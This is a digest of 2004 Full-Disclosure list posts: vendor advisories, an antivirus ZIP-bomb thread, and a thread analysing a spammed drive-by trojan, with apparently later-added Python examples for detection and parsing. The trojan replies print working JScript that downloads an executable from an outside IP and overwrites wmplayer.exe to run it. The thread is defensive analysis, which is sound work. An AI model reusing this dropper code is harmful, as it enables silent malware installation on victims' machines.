[Full-Disclosure] Akamai DoS - insider job?

2004-06-16 Thread Feher Tamas
http://www.overclockersclub.com/?read=8733819

The Akamai attacks started in the morning and were detected by
Keynote Systems, a web tracking company that is able to track the load
and bandwidth on the Internet. According to Keynote they saw
an Internet performance issue this morning
...
They have tracked the attacker back to a person who is at the Akamai
Technologies ISP. No other information has been given to us at this
time. We do not know if the FBI is working on this issue right now, but
we expect them to do so.


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] spamming trojan?

2004-06-16 Thread Geo.
Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)

http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)

which brings up a frames based page with one of the frames containing this

function InjectedDuringRedirection(){

 showModalDialog('md.htm',window,dialogTop:-1\;dialogLeft:-1\;dialo
gHeight:1\;dialogWidth:1\;).location=javascript:'SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'\/script';

Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.

Geo.



[Full-Disclosure] Re: Multiple Antivirus Scanners DoS attack.

2004-06-16 Thread Luca Gibelli

 *DrWeb (http://www.drweb.ru/)
 *AVG v7.0.251
 *ClamAV version 0.70, 0.72   --- please confirm this!
 *eTrust InoculateIT version 6.0
 Are vulnerable.
 
ClamAV is not vulnerable and hasn't been for a long time (at least 
since 0.6x IIRC).

Just try it:
$ clamscan SERVER_dwn.zip
SERVER_dwn.zip: Oversized.Zip FOUND
 
 
-- 
Luca Gibelli ([EMAIL PROTECTED]) - http://www.ClamAV.net - A GPL virus scanner
PGP Key Fingerprint: C782 121E 8C3A 90E3 7A87  D802 6277 8FF4 5EFC 5582
PGP Key Available on: Key Servers || http://www.clamav.net/gpg/nervoso.gpg

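ClamAV's Oversized.Zip verdict is the sane response to this class of sample: judge the archive by what its central directory claims before inflating anything. As an added illustration for this thread (not code from the list, from ClamAV or from any of the scanners named above), the Python below reads only the ZIP metadata and flags entries whose declared uncompressed size or compression ratio exceeds a threshold. The thresholds are assumptions, and the "bomb" it tests against is constructed in-process from repeated zero bytes; it is not the SERVER_dwn.zip sample.

```python
import io
import zipfile

# Thresholds are assumptions for illustration; tune them for your environment.
MAX_UNCOMPRESSED = 100 * 1024 * 1024   # 100 MiB declared size per entry
MAX_RATIO = 200.0                      # uncompressed / compressed per entry
MAX_TOTAL = 500 * 1024 * 1024          # 500 MiB declared size for the whole archive


def inspect_zip(data: bytes) -> dict:
    """Read only the central directory and decide whether the archive is
    'oversized' in the sense an AV engine would refuse it.  Nothing is
    extracted, so a decompression bomb cannot exhaust memory or disk while
    it is being judged.  Returns the verdict plus the offending entries."""
    findings = []
    total = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            total += info.file_size
            # compress_size of 0 is legitimate only for an empty entry;
            # an entry that claims data but zero stored bytes is bogus.
            if info.compress_size == 0:
                ratio = float("inf") if info.file_size else 0.0
            else:
                ratio = info.file_size / info.compress_size
            reasons = []
            if info.file_size > MAX_UNCOMPRESSED:
                reasons.append("declared size %d exceeds limit" % info.file_size)
            if ratio > MAX_RATIO:
                reasons.append("ratio %.0f:1 exceeds limit" % ratio)
            if reasons:
                findings.append((info.filename, info.file_size,
                                 info.compress_size, reasons))
    oversized = bool(findings) or total > MAX_TOTAL
    return {"oversized": oversized, "total_declared": total, "entries": findings}


def build_sample_zip(megabytes: int) -> bytes:
    """Constructed test input: one entry of repeated zero bytes, which
    deflate shrinks by roughly 1000:1.  A stand-in shaped like the
    oversized sample discussed on the list, not that file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("SERVER.exe", b"\x00" * (megabytes * 1024 * 1024))
    return buf.getvalue()


def build_benign_zip() -> bytes:
    """Constructed control: 1 KiB of varied bytes that deflate barely shrinks."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("readme.bin", bytes(range(256)) * 4)
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in (("bomb", build_sample_zip(8)), ("benign", build_benign_zip())):
        verdict = inspect_zip(blob)
        print(name, "-> Oversized.Zip FOUND" if verdict["oversized"] else "-> OK",
              verdict["entries"])
```

The ratio test matters more than the absolute-size test for mail gateways: a multi-gigabyte declared size is an obvious refusal, but a few megabytes that came from a few kilobytes is the pattern that takes a scanner down when it extracts first and measures afterwards.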


Re: [Full-Disclosure] spamming trojan?

2004-06-16 Thread Joe Stewart
On Wed, 16 Jun 2004 08:23:59, [EMAIL PROTECTED] wrote:
 Anyone want to try and analyze what this thing is? It was spammed to 
 about 30 addresses here this morning. 

The end stage appears to be a new variant of the Cjdra proxy trojan. 
This person has been spreading trojans via spammed-exploit for a while 
now, and now it looks as if he/she has upgraded to the latest IE 
exploit.

http://vil.nai.com/vil/content/v_100939.htm describes an older variant.

-Joe

-- 
Joe Stewart, GCIH 
Senior Security Researcher
LURHQ http://www.lurhq.com/



RE: [Full-Disclosure] spamming trojan?

2004-06-16 Thread Geo.

The end stage appears to be a new variant of the Cjdra proxy trojan.
This person has been spreading trojans via spammed-exploit for a while
now, and now it looks as if he/she has upgraded to the latest IE
exploit.


Am I correct in assuming that this is using the as yet still unpatched IE
exploit and that this is a little more serious than installing adware?

Where the heck are Microsoft and Scott "Information Anarchy" Culp and the
Trusted Computing Forum now? Don't be blaming customers for not visiting
windows update this time.

Geo.



[Full-Disclosure] SUSE Security Announcement: kernel (SuSE-SA:2004:017)

2004-06-16 Thread Thomas Biege

-BEGIN PGP SIGNED MESSAGE-

__

SUSE Security Announcement

Package:kernel
Announcement-ID:SuSE-SA:2004:017
Date:   Wednesday, Jun 16th 2004 15:20 MEST
Affected products:  8.0, 8.1, 8.2, 9.0, 9.1
SuSE Linux Database Server,
SuSE eMail Server III, 3.1
SuSE Linux Enterprise Server 7, 8
SuSE Linux Firewall on CD/Admin host
SuSE Linux Connectivity Server
SuSE Linux Office Server
Vulnerability Type: local denial-of-service attack
Severity (1-10):4
SUSE default package:   no
Cross References:   CAN-2004-0554

Content of this advisory:
1) security vulnerability resolved:
 - floating point exception causes system crash
   problem description, discussion, solution and upgrade information
2) pending vulnerabilities, solutions, workarounds:
 - icecast
 - sitecopy
 - cadaver
 - OpenOffice_org
 - tripwire
 - postgresql
 - lha
 - XDM
 - mod_proxy
 3) standard appendix (further information)

__

1)  problem description, brief discussion, solution, upgrade information

The Linux kernel is vulnerable to a local denial-of-service attack.
By using a C program it is possible to trigger a floating point
exception that puts the kernel into an unusable state.
To execute this attack a malicious user needs shell access to the
victim's machine.
The severity of this bug is considered low because local denial-of-
service attacks are hard to prevent in general.
Additionally the bug is limited to x86 and x86_64 architecture.



SPECIAL INSTALL INSTRUCTIONS:
==
The following paragraphs will guide you through the installation
process in a step-by-step fashion. The character sequence 
marks the beginning of a new paragraph. In some cases, the steps
outlined in a particular paragraph may or may not be applicable
to your situation.
Therefore, please make sure to read through all of the steps below
before attempting any of these procedures.
All of the commands that need to be executed are required to be
run as the superuser (root). Each step relies on the steps before
it to complete successfully.
Note: The update packages for the SuSE Linux Enterprise Server 7
(SLES7) are being tested at the moment and will be published as soon
as possible.


   Step 1: Determine the needed kernel type

Please use the following command to find the kernel type that is
installed on your system:

  rpm -qf /boot/vmlinuz

Following are the possible kernel types (disregard the version and
build number following the name separated by the - character)

  k_deflt   # default kernel, good for most systems.
  k_i386# kernel for older processors and chipsets
  k_athlon  # kernel made specifically for AMD Athlon(tm) family processors
  k_psmp# kernel for Pentium-I dual processor systems
  k_smp # kernel for SMP systems (Pentium-II and above)
  k_smp4G   # kernel for SMP systems which supports a maximum of 4G of RAM
  kernel-64k-pagesize
  kernel-bigsmp
  kernel-default
  kernel-smp

   Step 2: Download the package for your system

Please download the kernel RPM package for your distribution with the
name as indicated by Step 1. The list of all kernel rpm packages is
appended below. Note: The kernel-source package does not
contain a binary kernel in bootable form. Instead, it contains the
sources that the binary kernel rpm packages are created from. It can be
used by administrators who have decided to build their own kernel.
Since the kernel-source.rpm is an installable (compiled) package that
contains sources for the linux kernel, it is not the source RPM for
the kernel RPM binary packages.

The kernel RPM binary packages for the distributions can be found at the
locations below ftp://ftp.suse.com/pub/suse/i386/update/.

  8.0/images/
  8.1/rpm/i586
  8.2/rpm/i586
  9.0/rpm/i586
  9.1/rpm/i586

After downloading the kernel RPM package for your system, you should
verify the authenticity of the kernel rpm package using the methods as
listed in section 3) of each SUSE Security Announcement.


   Step 3: Installing your kernel rpm package

Install the rpm package that you have downloaded in Step 2 with
the command
rpm -Uhv 

[Full-Disclosure] [ GLSA 200406-11 ] Horde-IMP: Input validation vulnerability

2004-06-16 Thread Kurt Lieber
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200406-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Horde-IMP: Input validation vulnerability
  Date: June 16, 2004
  Bugs: #53862
ID: 200406-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An input validation vulnerability has been discovered in Horde-IMP.

Background
==

Horde-IMP is the Internet Messaging Program. It is written in PHP and
provides webmail access to IMAP and POP3 accounts.

Affected packages
=

-------------------------------------------------------------------
 Package                /   Vulnerable   /         Unaffected
-------------------------------------------------------------------
  1  net-www/horde-imp       <= 3.2.3                >= 3.2.4

Description
===

Horde-IMP fails to properly sanitize email messages that contain
malicious HTML or script code.

Impact
==

By enticing a user to read a specially crafted e-mail, an attacker can
execute arbitrary scripts running in the context of the victim's
browser. This could lead to a compromise of the user's webmail account,
cookie theft, etc.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Horde-IMP users should upgrade to the latest stable version:

# emerge sync

# emerge -pv ">=net-www/horde-imp-3.2.4"
# emerge ">=net-www/horde-imp-3.2.4"

References
==

  [ 1 ] Bugtraq Announcement
http://www.securityfocus.com/bid/10501

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 http://security.gentoo.org/glsa/glsa-200406-11.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0





Re: [Full-Disclosure] spamming trojan?

2004-06-16 Thread Michael Gargiullo
On Wed, 2004-06-16 at 08:23, Geo. wrote:
 Received a spam this morning claiming I have a voicemail with the link
 (warning do not click the link)
 
 http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
 
 which brings up a frames based page with one of the frames containing this
 
 function InjectedDuringRedirection(){
 
  showModalDialog('md.htm',window,dialogTop:-1\;dialogLeft:-1\;dialo
 gHeight:1\;dialogWidth:1\;).location=javascript:'SCRIPT
 SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'\/script';
 
 Anyone want to try and analyze what this thing is? It was spammed to about
 30 addresses here this morning.
 
 Geo.


Here's the contents:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe", 0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe", 2);
location.href = "mms://";

so whatever w_e_d.exe is...



[Full-Disclosure] Cisco Security Advisory: Cisco IOS Malformed BGP packet causes reload

2004-06-16 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco IOS Malformed BGP Packet Causes Reload

Revision 1.0


Last Updated June 16 15:00 UTC (GMT)

For Public Release 2004 June 16 15:00 UTC (GMT)

- ---

Please provide your feedback on this document.

- ---

Contents

Summary
Affected Products
Details
Impact
Software Versions and Fixes
Obtaining Fixed Software
Workarounds
Exploitation and Public Announcements
Status of This Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- ---

Summary
===

A Cisco device running IOS and enabled for the Border Gateway Protocol (BGP) is
vulnerable to a Denial of Service (DOS) attack from a malformed BGP packet. The
BGP protocol is not enabled by default, and must be configured in order to
accept traffic from an explicitly defined peer. Unless the malicious traffic
appears to be sourced from a configured, trusted peer, it would be difficult to
inject a malformed packet.

Cisco has made free software available to address this problem.

This advisory is available at 
http://www.cisco.com/warp/public/707/cisco-sa-20040616-bgp.shtml.

Affected Products
=

Vulnerable Products

This issue affects all Cisco devices running any unfixed version of Cisco IOS
code and configured for BGP routing.

A router which is running the BGP process will have a line in the config
defining the AS number, which can be seen by issuing the command show
running-config:

router bgp <AS number>

This vulnerability is present in any unfixed version of IOS, from the beginning
of support for the BGP protocol, including versions 9.x, 10.x, 11.x and 12.x.

To determine the software running on a Cisco product, log in to the device and
issue the show version command to display the system banner. Cisco IOS software
will identify itself as Internetwork Operating System Software or simply IOS
®. On the next line of output, the image name will be displayed between
parentheses, followed by Version and the IOS release name. Other Cisco
devices will not have the show version command or will give different output.

The following example identifies a Cisco product running IOS release 12.0(3)
with an installed image name of C2500-IS-L:

Cisco Internetwork Operating System Software IOS (TM)

2500 Software (C2500-IS-L), Version 12.0(3), RELEASE SOFTWARE

The release train label is 12.0.

The next example shows a product running IOS release 12.0(2a)T1 with an image
name of C2600-JS-MZ:

Cisco Internetwork Operating System Software IOS (tm)
C2600 Software (C2600-JS-MZ), Version 12.0(2a)T1, RELEASE SOFTWARE (fc1)

Additional information about Cisco IOS release naming can be found at 
http://www.cisco.com/warp/public/620/1.html.

Products Confirmed Not Vulnerable

Products confirmed not to be vulnerable include devices which cannot
participate in BGP or cannot be configured for BGP.

Details
===

The Border Gateway Protocol (BGP) is a routing protocol defined by RFC 1771,
and designed to manage IP routing in large networks. An affected Cisco device
running a vulnerable version of Cisco IOS software and enabling the BGP
protocol will reload when a malformed BGP packet is received. BGP runs over
TCP, a reliable transport protocol which requires a valid three way handshake
before any further messages will be accepted. The Cisco IOS implementation of
BGP requires the explicit definition of a neighbor before a connection can be
established, and traffic must appear to come from that neighbor. These
implementation details make it very difficult to send a BGP packet to a Cisco
IOS device from an unauthorized source.

A Cisco device receiving an invalid BGP packet will reset and may take several
minutes to become fully functional. This vulnerability may be exploited
repeatedly resulting in an extended DOS attack. This issue is documented in bug
IDs CSCdu53656 and CSCea28131.
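RFC 1771 fixes the framing the advisory relies on: a 16-octet marker, a 2-octet length that must lie between 19 and 4096, and a 1-octet type, with an OPEN body of at least 10 octets behind it. A receiver that validates every one of those fields before acting on them answers a malformed message with a NOTIFICATION instead of falling over. The parser below is an added example written for this page; it is not Cisco IOS code, and it does not reproduce the trigger for CSCdu53656/CSCea28131, which the advisory does not describe. The sample messages are constructed.

```python
import ipaddress
import struct

BGP_HEADER_LEN = 19
BGP_MAX_LEN = 4096
MARKER = b"\xff" * 16           # all-ones marker (RFC 1771 s4.1, no authentication)
TYPES = {1: "OPEN", 2: "UPDATE", 3: "NOTIFICATION", 4: "KEEPALIVE"}
OPEN_MIN_BODY = 10              # version(1) my AS(2) hold time(2) BGP id(4) opt len(1)


class MalformedBGP(ValueError):
    """Anything a conformant speaker must answer with a NOTIFICATION
    (Message Header Error / OPEN Message Error) rather than process.
    Raising here, before any field is indexed, is what keeps a hostile
    peer from turning a parse error into a crash."""


def parse_message(data: bytes) -> dict:
    if len(data) < BGP_HEADER_LEN:
        raise MalformedBGP("short header: %d bytes" % len(data))
    marker, length, mtype = struct.unpack("!16sHB", data[:BGP_HEADER_LEN])
    if marker != MARKER:
        raise MalformedBGP("bad marker (Connection Not Synchronized)")
    if length < BGP_HEADER_LEN or length > BGP_MAX_LEN:
        raise MalformedBGP("bad length %d" % length)
    if length != len(data):
        raise MalformedBGP("length field %d != %d bytes on the wire" % (length, len(data)))
    if mtype not in TYPES:
        raise MalformedBGP("bad message type %d" % mtype)
    body = data[BGP_HEADER_LEN:length]
    msg = {"type": TYPES[mtype], "length": length}
    if mtype == 4 and body:
        raise MalformedBGP("KEEPALIVE must be exactly 19 bytes")
    if mtype == 1:
        msg.update(parse_open(body))
    return msg


def parse_open(body: bytes) -> dict:
    if len(body) < OPEN_MIN_BODY:
        raise MalformedBGP("short OPEN body")
    version, my_as, hold, bgp_id, optlen = struct.unpack("!BHHIB", body[:OPEN_MIN_BODY])
    if version != 4:
        raise MalformedBGP("unsupported version %d" % version)
    if my_as == 0:
        raise MalformedBGP("bad peer AS 0")
    if hold in (1, 2):               # RFC 1771 s4.2: hold time is 0 or at least 3
        raise MalformedBGP("unacceptable hold time %d" % hold)
    if bgp_id == 0:
        raise MalformedBGP("bad BGP identifier")
    if len(body) != OPEN_MIN_BODY + optlen:
        raise MalformedBGP("optional parameter length %d does not match body" % optlen)
    return {"version": version, "peer_as": my_as, "hold_time": hold,
            "bgp_id": str(ipaddress.IPv4Address(bgp_id)), "opt_params_len": optlen}


def build_message(mtype: int, body: bytes = b"") -> bytes:
    return MARKER + struct.pack("!HB", BGP_HEADER_LEN + len(body), mtype) + body


def build_open(my_as: int, hold: int, bgp_id: str) -> bytes:
    body = struct.pack("!BHHIB", 4, my_as, hold, int(ipaddress.IPv4Address(bgp_id)), 0)
    return build_message(1, body)


# Constructed samples: a well-formed KEEPALIVE and OPEN, then three
# malformed messages a receiver must refuse without falling over.
KEEPALIVE = build_message(4)
OPEN = build_open(64512, 180, "192.0.2.1")
BAD_MARKER = b"\x00" * 16 + KEEPALIVE[16:]
BAD_LENGTH = MARKER + struct.pack("!HB", 5, 4)      # length field below header size
BAD_TYPE = build_message(9)


def classify(data: bytes) -> str:
    """Message type for good input, or the reason it was rejected."""
    try:
        return parse_message(data)["type"]
    except MalformedBGP as e:
        return "REJECT: " + str(e)


if __name__ == "__main__":
    for name, pkt in (("keepalive", KEEPALIVE), ("open", OPEN), ("bad_marker", BAD_MARKER),
                      ("bad_length", BAD_LENGTH), ("bad_type", BAD_TYPE)):
        print("%-10s %s" % (name, classify(pkt)))
```

The length-versus-buffer check is the one most often skipped: trusting the 2-octet length field to slice the body is exactly how a short or oversized packet turns into an out-of-bounds read.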

Impact
==

Successful exploitation of this vulnerability results in a reload of the
device. Repeated exploitation could result in a sustained DoS attack.

Software Versions and Fixes
===

Note: Many of the releases in this table were fixed prior to the release of
other IOS advisories. Read the table carefully to determine if your IOS release
contains these fixes. Most fixed releases for the TCP and SNMP advisories such
as http://www.cisco.com/warp/public/707/cisco-sa-20040420-snmp.shtml and 
http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml
contained the fixes for this BGP advisory.

Each row of the Cisco IOS software table (below) describes a release train and
the platforms or products for which it is intended. If a given release train

[Full-Disclosure] [ GLSA 200406-12 ] Webmin: Multiple vulnerabilities

2004-06-16 Thread Kurt Lieber
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200406-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Webmin: Multiple vulnerabilities
  Date: June 16, 2004
  Bugs: #53375
ID: 200406-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Webmin contains two security vulnerabilities which could lead to a
Denial of Service attack and information disclosure.

Background
==

Webmin is a web-based administration tool for Unix. It supports a wide
range of applications including Apache, DNS, file sharing and others.

Affected packages
=

-------------------------------------------------------------------
 Package               /   Vulnerable   /          Unaffected
-------------------------------------------------------------------
  1  app-admin/webmin       <= 1.140-r1               >= 1.150

Description
===

Webmin contains two security vulnerabilities. One allows any user to
view the configuration of any module and the other could allow an
attacker to lock out a valid user by sending an invalid username and
password.

Impact
==

An authenticated user could use these vulnerabilities to view the
configuration of any module thus potentially obtaining important
knowledge about configuration settings. Furthermore an attacker could
lock out legitimate users by sending invalid login information.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Webmin users should upgrade to the latest stable version:

# emerge sync

# emerge -pv ">=app-admin/webmin-1.150"
# emerge ">=app-admin/webmin-1.150"

References
==

  [ 1 ] Bugtraq Announcement
http://www.securityfocus.com/bid/10474
  [ 2 ] Webmin Changelog
http://www.webmin.com/changes-1.150.html

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 http://security.gentoo.org/glsa/glsa-200406-12.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0





RE: [Full-Disclosure] Antivirus/Trojan/Spyware scanners DoS!

2004-06-16 Thread Geo.
Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)

http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)

which brings up a frames based page with one of the frames containing this

function InjectedDuringRedirection(){

 showModalDialog('md.htm',window,dialogTop:-1\;dialogLeft:-1\;dialo
gHeight:1\;dialogWidth:1\;).location=javascript:'SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'\/script';

Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.

Geo.



[Full-Disclosure] (no subject)

2004-06-16 Thread Bill Cerynik
AMEN!!!  Preach it, brother!

Best regards,
Bill Cerynik
Managing Partner

VC Consulting LLC
973.616.8170
[EMAIL PROTECTED]
http://www.vcconsulting.biz

Bringing open source solutions to the real world


Message: 12
Date: Tue, 15 Jun 2004 14:52:11 -0400
From: Len Rose [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Administrivia: Classical Rant

ATTENTION LAMERS

 Speaking for myself only, something has to be done
 about the quality of the information, and the standards
 of netiquette on this list.

 We all don't need to see mindless banter, and other noise
 spewing back and forth. If you can, please try to not post
 this spewage to the list, but instead send mail to each other
 (after carefully cutting and pasting on your windows desktop)

 If you must send it to the list it must be in terms of
 technical content, whether it is of a real security issue
 and not if Yahoo will increase your disk space or what slashdorks
 posted about something that was known since 2 months ago.

 I use the word technical loosely as in my mind, anything
 security related is inherently technical even if it is not
 actually dealing with code or networks or systems.

 I'm very sick of seeing the amount of lame crap on this list,
 and I imagine a great deal of others are too.

 Thanks for listening.

  PS Unlike other reputable lists, we try not to censor
 anyone if they at least subscribe and never hit the
 queue. Lately we default to delete and try to approve
 those people who insist on posting without subscribing,
 or posting from a non-subscribed address. If reputable
 means bugtraq or cert then beat me with a stick.




[Full-Disclosure] Re: Antivirus/trojan

2004-06-16 Thread Paul
It is the Win32/Zafi.B worm.
one step at a time...

Re: [Full-Disclosure] spamming trojan?

2004-06-16 Thread Paul Schmehl
--On Wednesday, June 16, 2004 08:23:59 AM -0400 Geo. 
[EMAIL PROTECTED] wrote:

Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)
http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
which brings up a frames based page with one of the frames containing this
function InjectedDuringRedirection(){
 showModalDialog('md.htm',window,dialogTop:-1\;dialogLeft:-1\;di
alo gHeight:1\;dialogWidth:1\;).location=javascript:'SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'\/script';
Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.
All this does is call more functions:

function getRealShell() {
   // write a script tag into the hidden iframe to pull the second stage
   myiframe.document.write("<SCRIPT SRC='http://219.234.95.124/vbox/shellscript.js'><\/SCRIPT>");
}

document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()", 100);

The real action is at the RealShell address:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe", 0);   // synchronous fetch of the binary
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;   // adModeReadWrite
s.Type = 1;   // adTypeBinary
s.Open();
s.Write(x.responseBody);
// adSaveCreateOverWrite: replaces the real Media Player binary on disk
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe", 2);
location.href = "mms://";   // the mms: handler launches wmplayer.exe, now the trojan

The rest should be fairly obvious from the above code.
Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
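The chain laid out in this thread (a loader script, a hidden about:blank iframe, an XMLHTTP fetch of a binary, an ADODB.Stream write over wmplayer.exe, then an mms: navigation to launch it) is a recognisable signature, and a proxy or mail gateway can score a page on it without executing anything. The scanner below is an added example for this page, not code from the thread; the sample page it runs over is constructed with the RFC 5737 documentation address 192.0.2.10 in place of the real host, and the rule weights and threshold are assumptions.

```python
import re

# Each rule is (name, compiled regex, weight).  Weights are assumptions
# chosen so that the download-and-overwrite pattern scores well above
# the threshold while any single rule on its own does not.
RULES = [
    ("xmlhttp_fetch", re.compile(r"ActiveXObject\s*\(\s*['\"]Microsoft\.XMLHTTP['\"]", re.I), 1),
    ("adodb_stream", re.compile(r"ActiveXObject\s*\(\s*['\"]ADODB\.Stream['\"]", re.I), 2),
    ("save_to_file", re.compile(r"\.SaveToFile\s*\(", re.I), 2),
    ("binary_stream", re.compile(r"\.Type\s*=\s*1\b"), 1),
    ("overwrite_system_exe", re.compile(r"Program Files.*?\.exe", re.I), 2),
    ("modal_dialog_loader", re.compile(r"showModalDialog\s*\(", re.I), 1),
    ("hidden_iframe", re.compile(r"<IFRAME[^>]*SRC=['\"]?about:blank", re.I), 1),
    ("protocol_handler_launch", re.compile(r"location\.href\s*=\s*['\"](mms|hcp|telnet):", re.I), 2),
]

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
SCORE_THRESHOLD = 5


def defang(url: str) -> str:
    """hxxp:// and [.] so the indicator can be pasted into a ticket or a
    list post without mail clients turning it into a clickable link."""
    return (url.replace("http://", "hxxp://")
               .replace("https://", "hxxps://")
               .replace(".", "[.]"))


def scan_page(html: str) -> dict:
    """Score an HTML/JS document against RULES and pull out remote URLs."""
    hits = [name for name, rx, _ in RULES if rx.search(html)]
    score = sum(w for name, _, w in RULES if name in hits)
    urls = sorted({defang(u) for u in URL_RE.findall(html)})
    return {"malicious": score >= SCORE_THRESHOLD, "score": score,
            "hits": hits, "urls": urls}


# Constructed sample: the shape of the thread's loader and payload with the
# real host replaced by a documentation address.  Not the live page.
SAMPLE_PAGE = r"""
<script>
document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://192.0.2.10/vbox/w_e_d.exe", 0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3; s.Type = 1; s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe", 2);
location.href = "mms://";
</script>
"""

# Constructed control: an ordinary asynchronous request to a web API.
BENIGN_PAGE = r"""
<script>
var req = new XMLHttpRequest();
req.open("GET", "https://example.org/api/status", true);
req.send();
</script>
"""

if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_PAGE), ("benign", BENIGN_PAGE)):
        print(label, scan_page(page))
```

Scoring rather than matching a single string is deliberate: ADODB.Stream and XMLHTTP each have legitimate intranet uses, but a page that fetches a binary, opens a binary stream, writes it under Program Files and then navigates to a protocol handler has no benign reading.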


Re: [Full-Disclosure] Akamai

2004-06-16 Thread Paul Schmehl
--On Wednesday, June 16, 2004 11:53:23 AM +1000 Darren Reed 
[EMAIL PROTECTED] wrote:
This is a whole new play ground for organised crime, mostly thanks
to Microsoft.  You've got millions of PC's around the world that
are largely, in one way or another, susceptible to computer virii,
making them open targets for use as minions.  And the perfect seed
for spreading them is the databases of email addresses used by
spammers...
If networks simply took responsibility for the traffic that comes from 
them, this problem wouldn't exist.  It's completely trivial to find 
infected hosts on a network through passive monitoring.  They should then 
be disconnected until they are properly cleaned and secured.

Unless networks begin doing this routinely (including ISPs), legislation 
will be introduced to solve the problem, and then we will all be much 
worse off.  There's nothing like a law to completely screw things up.

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/


RE: [Full-Disclosure] Antivirus/Trojan/Spyware scanners DoS!

2004-06-16 Thread Pratik Mehta
The shell code is located at

 http://219.234.95.124/vbox/shellscript.js

and McAfee points it out as:

VBS/Psyme - Trojan

-Pratik

 Geo. [EMAIL PROTECTED] 6/16/2004 7:22:48 AM 
Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)

http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)

which brings up a frames based page with one of the frames containing this

function InjectedDuringRedirection(){

 showModalDialog('md.htm',window,dialogTop:-1\;dialogLeft:-1\;dialo
gHeight:1\;dialogWidth:1\;).location=javascript:'SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'\/script';

Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.

Geo.



Re: [Full-Disclosure] spamming trojan?

2004-06-16 Thread joe smith
I used PE Explorer.

